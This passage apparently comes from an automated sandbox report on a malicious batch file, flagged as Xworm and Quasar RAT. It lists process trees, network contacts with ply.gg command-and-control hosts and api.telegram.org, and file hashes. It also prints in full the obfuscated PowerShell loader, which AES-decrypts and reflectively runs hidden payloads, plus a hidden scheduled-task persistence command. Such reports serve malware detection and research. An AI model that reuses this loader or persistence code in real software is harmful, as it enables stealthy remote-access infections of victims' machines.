PID 4992 wrote to memory of 1492 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1492 wrote to memory of 2116 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1492 wrote to memory of 2116 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1492 wrote to memory of 3132 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 1492 wrote to memory of 3132 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 3132 wrote to memory of 3164 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 3132 wrote to memory of 3164 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 3164 wrote to memory of 2208 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3164 wrote to memory of 2208 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2208 wrote to memory of 3636 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\XClientNOT.exe
PID 2208 wrote to memory of 3636 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\XClientNOT.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Client-built.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rut3Nxs7NHGxRfDGW4AZiW/la3bsD/qGa57R1oLq3Jk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IMGBAJCtblcDTdjuAM5M1A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $rYugK=New-Object System.IO.MemoryStream(,$param_var); $FsizC=New-Object System.IO.MemoryStream; $qQyLB=New-Object System.IO.Compression.GZipStream($rYugK, [IO.Compression.CompressionMode]::Decompress); $qQyLB.CopyTo($FsizC); $qQyLB.Dispose(); $rYugK.Dispose(); $FsizC.Dispose(); $FsizC.ToArray();}function execute_function($param_var,$param2_var){ $YdjZT=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $WGHne=$YdjZT.EntryPoint; $WGHne.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Client-built.bat';$tUlfv=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Client-built.bat').Split([Environment]::NewLine);foreach ($opvFd in $tUlfv) { if ($opvFd.StartsWith(':: ')) { $vKkrO=$opvFd.Substring(3); break; }}$payloads_var=[string[]]$vKkrO.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_880_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_880.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_880.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_880.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rut3Nxs7NHGxRfDGW4AZiW/la3bsD/qGa57R1oLq3Jk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IMGBAJCtblcDTdjuAM5M1A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $rYugK=New-Object System.IO.MemoryStream(,$param_var); $FsizC=New-Object System.IO.MemoryStream; $qQyLB=New-Object System.IO.Compression.GZipStream($rYugK, [IO.Compression.CompressionMode]::Decompress); $qQyLB.CopyTo($FsizC); $qQyLB.Dispose(); $rYugK.Dispose(); $FsizC.Dispose(); $FsizC.ToArray();}function execute_function($param_var,$param2_var){ $YdjZT=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $WGHne=$YdjZT.EntryPoint; $WGHne.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_880.bat';$tUlfv=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_880.bat').Split([Environment]::NewLine);foreach ($opvFd in $tUlfv) { if ($opvFd.StartsWith(':: ')) { $vKkrO=$opvFd.Substring(3); break; }}$payloads_var=[string[]]$vKkrO.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Users\Admin\AppData\Local\Temp\XClientNOT.exe

"C:\Users\Admin\AppData\Local\Temp\XClientNOT.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 21.114.53.23.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 express-divorce.gl.at.ply.gg udp
US 147.185.221.18:22562 express-divorce.gl.at.ply.gg tcp
US 8.8.8.8:53 18.221.185.147.in-addr.arpa udp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 147.185.221.18:22562 express-divorce.gl.at.ply.gg tcp
US 8.8.8.8:53 traffic-collins.gl.at.ply.gg udp
US 147.185.221.19:24820 traffic-collins.gl.at.ply.gg tcp
US 8.8.8.8:53 19.221.185.147.in-addr.arpa udp
US 147.185.221.18:22562 express-divorce.gl.at.ply.gg tcp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 147.185.221.18:22562 express-divorce.gl.at.ply.gg tcp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 17.143.109.104.in-addr.arpa udp
US 147.185.221.18:22562 express-divorce.gl.at.ply.gg tcp
US 147.185.221.18:22562 express-divorce.gl.at.ply.gg tcp
US 147.185.221.18:22562 express-divorce.gl.at.ply.gg tcp

Files

memory/1492-1-0x00000250F8760000-0x00000250F8782000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1ww5ii4l.rff.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1492-4-0x00000250DE010000-0x00000250DE020000-memory.dmp

memory/1492-12-0x00000250DE010000-0x00000250DE020000-memory.dmp

memory/1492-0-0x00007FF81D0A0000-0x00007FF81DB61000-memory.dmp

memory/1492-13-0x00000250F89B0000-0x00000250F89B8000-memory.dmp

memory/1492-14-0x00000250F89C0000-0x00000250F8AFA000-memory.dmp

memory/2116-16-0x00007FF81D0A0000-0x00007FF81DB61000-memory.dmp

memory/2116-17-0x00000273372E0000-0x00000273372F0000-memory.dmp

memory/2116-18-0x00000273372E0000-0x00000273372F0000-memory.dmp

memory/2116-28-0x00000273372E0000-0x00000273372F0000-memory.dmp

memory/2116-29-0x00000273372E0000-0x00000273372F0000-memory.dmp

memory/2116-32-0x00007FF81D0A0000-0x00007FF81DB61000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f8d49a4af7a844bfc7247d5670def557
SHA1 26ae0ce194a77a7a1887cf93741293fdfa6c94c4
SHA256 61c60aa2e781a7f6ab54577db26d1be6ca3bf40c4c1d29eca48698e8cb5e1a2b
SHA512 9e034173b20c85fc63ec88d045ace936af567e52caafe5e5735cf6fd5e72d040b992b38c0490ee9d9e43f6f934695d5913bc7a0c682b36c99e5e2d9923c24a9c

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 661739d384d9dfd807a089721202900b
SHA1 5b2c5d6a7122b4ce849dc98e79a7713038feac55
SHA256 70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
SHA512 81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

C:\Users\Admin\AppData\Roaming\startup_str_880.vbs

MD5 cb82f6b4868c69302aa0f0d769cbc67e
SHA1 a0f5dfa79e967f926e43814fdb372c07f6dbe338
SHA256 952d59ec8eb7e2857dfecc5fb7b30483b67005962cf37ee22c33243976271f6c
SHA512 69819516721d4fa2224e4d710891290d7ef026c89ffbb4b5119491a15d383cda82c3ea46b2eb4681b53d0a0b87d06d5e79ec80afed2e4ea95eb4f2301e57a781

C:\Users\Admin\AppData\Roaming\startup_str_880.bat

MD5 566c653ae6a704041aef596fce6d6a8c
SHA1 da35608bf372a6113d941817a96bc3a17de9ef69
SHA256 950153a1ef5114d609ca8fa79a28374c1f24ae84a8f90ef0a21fb7914639b4e9
SHA512 98662e33f746dce81efe530f6544bf0d83eff2ff35d72bf54e105ef6de121108a4aa28d6e417d3c8e1584a5c0165f78b180574eaa489f11d7cd617b6d31e01c2

memory/2208-41-0x00007FF81D0A0000-0x00007FF81DB61000-memory.dmp

memory/2208-42-0x0000017340C50000-0x0000017340C60000-memory.dmp

memory/2208-43-0x0000017340C50000-0x0000017340C60000-memory.dmp

memory/1492-54-0x00007FF81D0A0000-0x00007FF81DB61000-memory.dmp

memory/2208-57-0x00000173432E0000-0x0000017343604000-memory.dmp

memory/2208-58-0x0000017340C50000-0x0000017340C60000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\XClientNOT.exe

MD5 dd466e4e324143a67a406797c23ee2bc
SHA1 cc369b99c18c9322734b14908e7b21f2bec48118
SHA256 1a87f2fed2a9263e703c44d25da8242016a640db930678a0f497879267c133c8
SHA512 603c082427129deac3bce210d87e3f4125dd429ad7fe13422b7a3d80f8e282ae8ad887a20e47de12a3f90c24ab4a143dc3b069fd8da122f4f96b70f94bd7f438

memory/3636-69-0x00007FF81D0A0000-0x00007FF81DB61000-memory.dmp

memory/3636-70-0x0000000000620000-0x000000000062E000-memory.dmp

memory/2208-71-0x0000017343C80000-0x0000017343CD0000-memory.dmp

memory/2208-72-0x0000017343D90000-0x0000017343E42000-memory.dmp

memory/2208-73-0x0000017344360000-0x0000017344522000-memory.dmp

memory/3636-74-0x000000001B410000-0x000000001B420000-memory.dmp

memory/2208-75-0x00007FF81D0A0000-0x00007FF81DB61000-memory.dmp

memory/2208-76-0x0000017340C50000-0x0000017340C60000-memory.dmp

memory/2208-77-0x0000017340C50000-0x0000017340C60000-memory.dmp

memory/2208-78-0x0000017340C50000-0x0000017340C60000-memory.dmp

memory/3636-79-0x00007FF81D0A0000-0x00007FF81DB61000-memory.dmp

memory/3636-80-0x000000001B410000-0x000000001B420000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-04-13 18:14

Reported

2024-04-13 18:16

Platform

win11-20240412-en

Max time kernel

60s

Max time network

70s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Client-built.bat"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Quasar RAT

trojan spyware quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A

Xworm

trojan rat xworm

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClientNOT.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-825860316-2493133627-3905166409-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4980 wrote to memory of 2284 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4980 wrote to memory of 2284 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2284 wrote to memory of 4148 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2284 wrote to memory of 4148 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2284 wrote to memory of 5024 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 2284 wrote to memory of 5024 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 5024 wrote to memory of 5008 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 5024 wrote to memory of 5008 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 5008 wrote to memory of 1532 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5008 wrote to memory of 1532 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1532 wrote to memory of 3128 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\XClientNOT.exe
PID 1532 wrote to memory of 3128 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\XClientNOT.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Client-built.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rut3Nxs7NHGxRfDGW4AZiW/la3bsD/qGa57R1oLq3Jk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IMGBAJCtblcDTdjuAM5M1A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $rYugK=New-Object System.IO.MemoryStream(,$param_var); $FsizC=New-Object System.IO.MemoryStream; $qQyLB=New-Object System.IO.Compression.GZipStream($rYugK, [IO.Compression.CompressionMode]::Decompress); $qQyLB.CopyTo($FsizC); $qQyLB.Dispose(); $rYugK.Dispose(); $FsizC.Dispose(); $FsizC.ToArray();}function execute_function($param_var,$param2_var){ $YdjZT=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $WGHne=$YdjZT.EntryPoint; $WGHne.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Client-built.bat';$tUlfv=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Client-built.bat').Split([Environment]::NewLine);foreach ($opvFd in $tUlfv) { if ($opvFd.StartsWith(':: ')) { $vKkrO=$opvFd.Substring(3); break; }}$payloads_var=[string[]]$vKkrO.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_134_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_134.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_134.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_134.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rut3Nxs7NHGxRfDGW4AZiW/la3bsD/qGa57R1oLq3Jk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IMGBAJCtblcDTdjuAM5M1A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $rYugK=New-Object System.IO.MemoryStream(,$param_var); $FsizC=New-Object System.IO.MemoryStream; $qQyLB=New-Object System.IO.Compression.GZipStream($rYugK, [IO.Compression.CompressionMode]::Decompress); $qQyLB.CopyTo($FsizC); $qQyLB.Dispose(); $rYugK.Dispose(); $FsizC.Dispose(); $FsizC.ToArray();}function execute_function($param_var,$param2_var){ $YdjZT=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $WGHne=$YdjZT.EntryPoint; $WGHne.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_134.bat';$tUlfv=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_134.bat').Split([Environment]::NewLine);foreach ($opvFd in $tUlfv) { if ($opvFd.StartsWith(':: ')) { $vKkrO=$opvFd.Substring(3); break; }}$payloads_var=[string[]]$vKkrO.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Users\Admin\AppData\Local\Temp\XClientNOT.exe

"C:\Users\Admin\AppData\Local\Temp\XClientNOT.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
NL 149.154.167.220:443 api.telegram.org tcp
US 147.185.221.18:22562 express-divorce.gl.at.ply.gg tcp
US 147.185.221.19:24820 traffic-collins.gl.at.ply.gg tcp
US 147.185.221.18:22562 express-divorce.gl.at.ply.gg tcp
US 147.185.221.18:22562 express-divorce.gl.at.ply.gg tcp
US 147.185.221.18:22562 express-divorce.gl.at.ply.gg tcp
US 147.185.221.19:24820 traffic-collins.gl.at.ply.gg tcp
US 147.185.221.18:22562 express-divorce.gl.at.ply.gg tcp
US 147.185.221.18:22562 express-divorce.gl.at.ply.gg tcp

Files

memory/2284-2-0x00000233EB4E0000-0x00000233EB502000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fwzoniql.fwe.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2284-9-0x00007FFC0BDB0000-0x00007FFC0C872000-memory.dmp

memory/2284-10-0x00000233EB580000-0x00000233EB590000-memory.dmp

memory/2284-11-0x00000233EB570000-0x00000233EB578000-memory.dmp

memory/2284-12-0x00000233EB790000-0x00000233EB8CA000-memory.dmp

memory/4148-14-0x00007FFC0BDB0000-0x00007FFC0C872000-memory.dmp

memory/4148-23-0x000001F43E3D0000-0x000001F43E3E0000-memory.dmp

memory/4148-26-0x00007FFC0BDB0000-0x00007FFC0C872000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4ca42e9cc6de90060a4503debda3ea58
